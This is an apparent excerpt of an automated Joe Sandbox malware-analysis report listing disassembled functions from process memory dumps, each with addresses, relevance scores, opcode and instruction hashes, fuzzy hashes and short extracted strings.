                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: fd40285d1c39aee1f34b08f1cdf5e6a5fdd6b4854ced145b37ca1cc30d89ddcb
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 28D012345778098FCA50E728D9955A4BA90FB0A214F8901D0E40CC71A1D3569894C741
                                                                      Function 00007FFAAB4306A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: 8e775593b871cf163d94e69cab048ce800a5f371b7ca8477b356607fbe37b5ea
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: F3C08C00E3B80F83B800732E14022ACAA005FC72A0FDC8272C00C402EA9C0E20DD01C6
                                                                      Function 00007FFAAB4312B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 708e1b1f48dbf187e256c2ed6fa2a0226d5ce4e22f227618604e5e6d21743c03
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: 4EC04C345619498FC948EB29C88591877A0FB1A215BD50094E40DC71B1D659DCD5C781
                                                                      Function 00007FFAAB433416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 043c47bc423648d726e615bf1b7e9b599c49079ba4b4ba02119048da8c2c0764
                                                                      • Instruction ID: 516ecce055e811f3ef4749f0c9dcc654b948086219cba8848fd5a3dc5dee2a81
                                                                      • Opcode Fuzzy Hash: 043c47bc423648d726e615bf1b7e9b599c49079ba4b4ba02119048da8c2c0764
                                                                      • Instruction Fuzzy Hash: 7FC04C42F19DAA97F255A228C42167F04969F84758F9444B4E00DC63D6CD0C5B4112C6
                                                                      Function 00007FFAAB433A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: 24b1bce6cbd833dc4b9e9e4d253a1cbbccf0467d2a60cc848af8e701f5d44cbc
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 3CC02220C2E008C3E32A833088002FE32802FAA300F0EC2B2C00EA20E2CE2828082280
                                                                      Function 00007FFAAB4306C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1dd8c2cdf387805c37ce32f6d2a4ee50c8b16e3c7e2bcbb0eb9a6893f7522ccf
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: BDB01200C7780F43A804337E084216478505F46150FC841B0D40C401D6984E10EC02C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4309B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 35bd8235306bd80574b2c1483b95ab5dc4fd4c4e9a54fe7c4dd9c0490cfdca20
                                                                      • Instruction ID: 089d256ea3558b575a18fe32b78e35e7c47cdd163aeb724b512eb924627a69e2
                                                                      • Opcode Fuzzy Hash: 35bd8235306bd80574b2c1483b95ab5dc4fd4c4e9a54fe7c4dd9c0490cfdca20
                                                                      • Instruction Fuzzy Hash: 0351D49BB5D0227AE11137FDF4499ED1BACAFC53767098AB7E04DC91D38C08688582E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB440D4C Relevance: 6.5, Strings: 5, Instructions: 261COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      • Opcode ID: 4a4013dc13d46f45fbac2d5a39e4da1a07656ee6a7f2e932f7eca25960112b55
                                                                      • Instruction ID: bf13dd4656c35cbe1780cedb36d0f69c7baa84367a100724228d90021d1f0630
                                                                      • Opcode Fuzzy Hash: 4a4013dc13d46f45fbac2d5a39e4da1a07656ee6a7f2e932f7eca25960112b55
                                                                      • Instruction Fuzzy Hash: 4D91F9B6A19A89CFE749DB68C8657E97FE1FB96354F4040BAC04DD73E2CA781424C780
                                                                      Function 00007FFAAB471945 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: d2da8fb33a745521926a8677901862193db33328efa3c7b4ad3332a367282c46
                                                                      • Instruction ID: 8c62620f2a0312fea6ef22f96121c4920217f0e281c509e780a9b6440c47c0da
                                                                      • Opcode Fuzzy Hash: d2da8fb33a745521926a8677901862193db33328efa3c7b4ad3332a367282c46
                                                                      • Instruction Fuzzy Hash: AFC1CD62A2D6964BE31D4B284C860B577D6EBD3241B18C67DD8DFC7097F928E84BC2C1
                                                                      Function 00007FFAAB472CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 72e76148861488b16c5115541b61301888a04f38cf50dbe22fd2f75dd9496606
                                                                      • Instruction ID: f53de22aba54a8f12f6ab51739cf25beb0047462b9da8af6e79313c368e48a23
                                                                      • Opcode Fuzzy Hash: 72e76148861488b16c5115541b61301888a04f38cf50dbe22fd2f75dd9496606
                                                                      • Instruction Fuzzy Hash: 1741A532A0891ACFDB58E758C495BB877A2FB9A350F0542B9D00DD76D6CE286C89C7C1
                                                                      Function 00007FFAAB475494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: 350b96a10d8fb3f30ba5530322056c178ceaddbc3010c985df6fe25edf3c42da
                                                                      • Instruction ID: 8bf1dbbf139df26b87072b9af06a37ea5ffccfab6ff1b2de761fd2c45e4d6400
                                                                      • Opcode Fuzzy Hash: 350b96a10d8fb3f30ba5530322056c178ceaddbc3010c985df6fe25edf3c42da
                                                                      • Instruction Fuzzy Hash: 03214F71A199598FE798EB28C8566F8B3A1FFA9340F5085F5D04DC31A2CD246DC58B80
                                                                      Function 00007FFAAB47DF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: 494b05bf56a2571290fd263feeda7ed67e24c714f2de5053d49a9ff5b01798c1
                                                                      • Instruction ID: 379848109fdcca08c0f9ed7aa6898098a715d87b404f6e8972b439e8bdbcad8c
                                                                      • Opcode Fuzzy Hash: 494b05bf56a2571290fd263feeda7ed67e24c714f2de5053d49a9ff5b01798c1
                                                                      • Instruction Fuzzy Hash: AB01BC72F1881ACBEB94EA28C4457BD73E1EFD4351F008576D00DD7180DE28A9D88BC0
                                                                      Function 00007FFAAB4737C9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction ID: 0fb0b3267fff6d9b5198283deacce8a94e31259c5d1254573310772f3fed70aa
                                                                      • Opcode Fuzzy Hash: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction Fuzzy Hash: A7F0E56050E7C04FD71A9A3888684517FA0EF2720134A41EFC045CF1E3DA1D9C89C701
                                                                      Function 00007FFAAB47AC59 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction ID: 6642da5c5362c2b8720c4522fa14d1824a09e59127200401373c1df10afea694
                                                                      • Opcode Fuzzy Hash: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction Fuzzy Hash: 0FE0657150E7C48FD71A963888698557FA4EF6720174941EEC045CF1A3EA1D9885C741
                                                                      Function 00007FFAAB472539 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction ID: 77caddb6fa254af773627cb71959afec764102713b10ca85366777bc4bd10943
                                                                      • Opcode Fuzzy Hash: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction Fuzzy Hash: 31F0657194A7C08FCB19DA3888A9855BF60EF6720174A42EEC045CF1A7DA2DD88ACB41
                                                                      Function 00007FFAAB47AD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction ID: c4a66ddf08b53fa0a81383682ee6730c9b94841a9b68fe8d8b89c9ab04022be3
                                                                      • Opcode Fuzzy Hash: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction Fuzzy Hash: 38F0657190E7C48FCB1ADB7488698557FA0EF6720174A55EFC045CF1A7EA2D8889CB41
                                                                      Function 00007FFAAB47B229 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction ID: a008cd5dd3ea68c49a7a6f871d611836c25210d640683a261409664c36777008
                                                                      • Opcode Fuzzy Hash: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction Fuzzy Hash: 49E0926144E3C04FCB06AB348875C453FA0DE2721178A40DEC045CB0B3D21E9849C702
                                                                      Function 00007FFAAB453FC9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 9669c547a404fca68f8ed6777d246c21afdc2124e53a4440b28720bff43f21f7
                                                                      • Instruction ID: 3a5c915d21f0fd17ae100fb08c38475f9233a177a8b138436f81daddd30c7a8f
                                                                      • Opcode Fuzzy Hash: 9669c547a404fca68f8ed6777d246c21afdc2124e53a4440b28720bff43f21f7
                                                                      • Instruction Fuzzy Hash: 47E0ED6154E7C04FD70A9B74886A9547F60AE6721074A41EEC089CF5B3D61E9849C711
                                                                      Function 00007FFAAB4725C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction ID: 0f74f1312c94d4367b3f86b64d29c7bed787e989357995fffc0e05907a7b0718
                                                                      • Opcode Fuzzy Hash: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction Fuzzy Hash: 2CE01A6144F7C08FCB4AEB7488698447FA0AE6721078A41EEC049CF1B7EA2E8889C701
                                                                      Function 00007FFAAB4789A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction ID: b6de03b5f97559c7f25ea08c8357f04626411faf07c42436bac23bd72c18a450
                                                                      • Opcode Fuzzy Hash: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction Fuzzy Hash: 65E01A7144F7C04FCB4AEB7488698447FB0AE6721078A40EEC049CF1B3E62E8849CB01
                                                                      Function 00007FFAAB4408D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction ID: 998911367f09f49b53b758e15389222f43d458d5cc4ba2ade463c100577cf6f7
                                                                      • Opcode Fuzzy Hash: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction Fuzzy Hash: CB412C3264C9159FD714FB6CE4889F87BE0EF8632170544BBD08ACB163DA10AC8183C1
                                                                      Function 00007FFAAB44090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd6051d6d8f48cdb4b5735b658963eab3887c0e7664b1c64fb692fc812c4903b
                                                                      • Instruction ID: 0c3c52f8c346fc9a2a080fdb6f5de589be1b6e46bc8f845eda7990e35e116c30
                                                                      • Opcode Fuzzy Hash: dd6051d6d8f48cdb4b5735b658963eab3887c0e7664b1c64fb692fc812c4903b
                                                                      • Instruction Fuzzy Hash: A6412763A4E6966FE714B3BCE09A9F87BD0EF85365B1444FBD04EC71A3CD18688182C5
                                                                      Function 00007FFAAB440998 Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab543eec825e551e424fc697a87382d72f6f23c06d3d921f6875dc3af3a8d241
                                                                      • Instruction ID: e82eb753ab908938fdc7d99487929c27d36fb6e28d6aad92b18def5d067dec58
                                                                      • Opcode Fuzzy Hash: ab543eec825e551e424fc697a87382d72f6f23c06d3d921f6875dc3af3a8d241
                                                                      • Instruction Fuzzy Hash: F0414B60A1EA899FE788F738C459AB57BD1EF9A350B1440BDE40EC33E3DD18AC558385
                                                                      Function 00007FFAAB440908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 713c8b5414808e1ca5e637a988efc28f32dc33321c35014708da64902c1609a9
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 4721D53130D8184FE768EB0CE889DB973D1FB5A32170101BAE58EC7136E911EC9287C1
                                                                      Function 00007FFAAB440960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48f7d3349f237d0cd259050161c7cd12cbc1f8481fe16f36fa7be5e052e18ae5
                                                                      • Instruction ID: 8dc1a4b53240b32075e3f6418f8cad7a3fc359ad7faf370abf3d7255b91f093c
                                                                      • Opcode Fuzzy Hash: 48f7d3349f237d0cd259050161c7cd12cbc1f8481fe16f36fa7be5e052e18ae5
                                                                      • Instruction Fuzzy Hash: F8312662A0EA566FF358B37CE44A9F877D1EF85361B1444BAD00FC32A3CC186C814284
                                                                      Function 00007FFAAB44116D Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5cc3a902f9309245da6a096720bf0bcf346abfae0e55ee3c01761571449c6c81
                                                                      • Instruction ID: 2aa688cce33b665c6fbd6960765cd51d5119b6a9814b48f8887eed6a70f167e8
                                                                      • Opcode Fuzzy Hash: 5cc3a902f9309245da6a096720bf0bcf346abfae0e55ee3c01761571449c6c81
                                                                      • Instruction Fuzzy Hash: AD31E67190DA4A8FDB45EB68C8559F97FF0FF5A310B0445BAC00EC71A2DA29A455C781
                                                                      Function 00007FFAAB440C25 Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7ab4e89eb648e421fc68a98013d16c83568118fe69ab67404afbb9e9efb0955
                                                                      • Instruction ID: fe0b2811f650fba7bd05e9ab2478d551debd32a497bb1dcb6d57b4401140dd71
                                                                      • Opcode Fuzzy Hash: b7ab4e89eb648e421fc68a98013d16c83568118fe69ab67404afbb9e9efb0955
                                                                      • Instruction Fuzzy Hash: C6312476A0D64ADFE302AB78D4042EC7FB0EF82351F0485B6D04DCA2D3D93829A987C1
                                                                      Function 00007FFAAB472601 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ddf3e0319d792d087a489c33ef01340538805b894fe7b514d237814a4fc9d1b
                                                                      • Instruction ID: acf8c37972bb2198ae0add632ef94403b8ce6bb8326e44875260aa4b4107c141
                                                                      • Opcode Fuzzy Hash: 9ddf3e0319d792d087a489c33ef01340538805b894fe7b514d237814a4fc9d1b
                                                                      • Instruction Fuzzy Hash: 8B21C851A0DA86CFE688E37D88A56B56A95FF9B344F0441BBE00CC35E3CC5968898382
                                                                      Function 00007FFAAB4469E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0e8734a81fe0e43e04ed680103ed0aeaea61d0be89529591f2455a8866224fc
                                                                      • Instruction ID: ee03251aa1758238b36b1a555fb4123206ec40dfb8eee1710cff3218864d1983
                                                                      • Opcode Fuzzy Hash: b0e8734a81fe0e43e04ed680103ed0aeaea61d0be89529591f2455a8866224fc
                                                                      • Instruction Fuzzy Hash: E021FF30D18959CFEB65DB04C4547E9B3E1FB59314F1085EAC40EE3291CB79AE88CB80
                                                                      Function 00007FFAAB446F3D Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
